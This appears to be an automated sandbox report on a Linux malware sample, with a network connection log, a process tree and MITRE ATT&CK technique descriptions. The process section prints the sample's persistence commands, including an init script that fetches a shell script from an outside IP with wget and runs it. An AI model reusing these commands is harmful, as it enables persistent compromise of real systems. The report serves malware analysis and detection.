Dec 24, 2024 05:44:19.377892971 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:19.378038883 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:19.378149986 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:19.497978926 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:19.884197950 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:20.049856901 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:20.501493931 CET	38242	60116	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:20.501653910 CET	60116	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:20.885627985 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:21.005424023 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:21.005609035 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:21.005683899 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:21.125241041 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:21.512300968 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:21.674088955 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:22.123914957 CET	38242	60118	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:22.124074936 CET	60118	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:22.513781071 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:22.633577108 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:22.633656025 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:22.633759022 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:22.753922939 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:23.139197111 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:23.306142092 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:23.757584095 CET	38242	60120	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:23.757690907 CET	60120	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:24.140326023 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:24.260014057 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:24.260112047 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:24.260189056 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:24.380110025 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:24.765599012 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:24.929919004 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:25.384969950 CET	38242	60122	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:25.385061979 CET	60122	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:25.766675949 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:25.886322975 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:25.886405945 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:25.886428118 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:26.006069899 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:26.389679909 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:26.549828053 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:27.010225058 CET	38242	60124	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:27.010298014 CET	60124	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:27.390861988 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:27.510519028 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:27.510629892 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:27.510724068 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:27.630255938 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:28.016464949 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:28.177958965 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:28.653105974 CET	38242	60126	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:28.653290033 CET	60126	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:29.018166065 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:29.138005972 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:29.138103962 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:29.138161898 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:29.257858992 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:29.643431902 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:29.805932999 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:30.259872913 CET	38242	60128	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:30.260025978 CET	60128	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:30.644671917 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:30.764372110 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:30.764476061 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:30.764533997 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:30.884315014 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:31.271369934 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:31.437997103 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:31.895296097 CET	38242	60130	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:31.895541906 CET	60130	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:32.272759914 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:32.392426968 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:32.392535925 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:32.392632961 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:32.512406111 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:32.896819115 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:33.058042049 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:33.506727934 CET	38242	60132	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:33.506943941 CET	60132	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:33.897921085 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:34.017560005 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:34.017678976 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:34.017716885 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:34.137438059 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:34.522422075 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:34.689903021 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:35.140978098 CET	38242	60134	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:35.141093969 CET	60134	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:35.524074078 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:35.643816948 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:35.643949986 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:35.644145012 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:35.763695955 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:36.149307013 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:36.313956022 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:36.762474060 CET	38242	60136	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:36.762569904 CET	60136	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:37.150779009 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:37.271619081 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:37.271720886 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:37.271857977 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:37.391594887 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:37.776911020 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:37.937863111 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:38.392559052 CET	38242	60138	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:38.392663956 CET	60138	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:38.778403044 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:38.899210930 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:38.899338007 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:38.899421930 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:39.018960953 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:39.405895948 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:39.569902897 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:40.019222021 CET	38242	60140	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:40.019332886 CET	60140	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:40.407664061 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:40.527417898 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:40.527631044 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:40.527645111 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:40.647167921 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:41.032733917 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:41.197953939 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:41.665769100 CET	38242	60142	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:41.665879011 CET	60142	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:42.033826113 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:42.153809071 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:42.153879881 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:42.153907061 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:42.273473978 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:42.658910036 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:42.821897030 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:43.282329082 CET	38242	60144	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:43.282466888 CET	60144	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:43.660311937 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:43.779936075 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:43.780076981 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:43.780139923 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:43.899663925 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:44.286359072 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:44.493441105 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:44.915734053 CET	38242	60146	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:44.915937901 CET	60146	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:45.287930012 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:45.407598019 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:45.407788038 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:45.407893896 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:45.527436972 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:45.913402081 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:46.073777914 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:46.535051107 CET	38242	60148	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:46.535180092 CET	60148	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:46.914932966 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:47.034696102 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:47.034862995 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:47.034970999 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:47.154726982 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:47.541256905 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:47.705909967 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:48.153390884 CET	38242	60150	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:48.153563976 CET	60150	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:48.542642117 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:48.663402081 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:48.663522959 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:48.663615942 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:48.783183098 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:49.169892073 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:49.329767942 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:49.801867962 CET	38242	60152	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:49.801975012 CET	60152	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:50.171236992 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:50.290699959 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:50.290837049 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:50.290906906 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:50.410403013 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:50.795957088 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:50.957910061 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:51.408669949 CET	38242	60154	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:51.408808947 CET	60154	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:51.797102928 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:51.916747093 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:51.916835070 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:51.916913986 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:52.036386967 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:52.421899080 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:52.581724882 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:53.039988995 CET	38242	60156	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:53.040093899 CET	60156	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:53.422913074 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:53.542572021 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:53.542695999 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:53.542747021 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:53.662416935 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:54.047403097 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:54.209770918 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:54.683999062 CET	38242	60158	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:54.684170961 CET	60158	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:55.048880100 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:55.168597937 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:55.168860912 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:55.168927908 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:55.288455009 CET	38242	60160	94.156.227.234	192.168.2.23
Dec 24, 2024 05:44:55.674038887 CET	60160	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 05:44:55.837836981 CET	38242	60160	94.156.227.234	192.168.2.23

System Behavior

Analysis Process: sh4.nn.elf PID: 6233, Parent PID: 6159

General

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	/tmp/sh4.nn.elf
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable custom.service >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable custom.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/system
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/system /etc/rcS.d/S99system
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh4.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh4.nn.elf'\n /tmp/sh4.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh4.nn.elf'\n killall sh4.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh4.nn.elf"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/sh4.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/sh4.nn.elf
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/usr/bin/mkdir
Arguments:	mkdir -p /etc/rc.d
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:42:50
Start date (UTC):	24/12/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	04:42:50
Start date (UTC):	24/12/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Start time (UTC):	04:42:50
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	04:42:50
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	04:42:50
Start date (UTC):	24/12/2024
Path:	/tmp/sh4.nn.elf
Arguments:	-
File size:	4139976 bytes
MD5 hash:	8943e5f8f8c280467b4472c15ae93ba9

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	04:42:49
Start date (UTC):	24/12/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Start time (UTC):	04:42:50
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	04:42:50
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	04:42:50
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	04:42:50
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Start time (UTC):	04:42:50
Start date (UTC):	24/12/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Start time (UTC):	04:42:50
Start date (UTC):	24/12/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
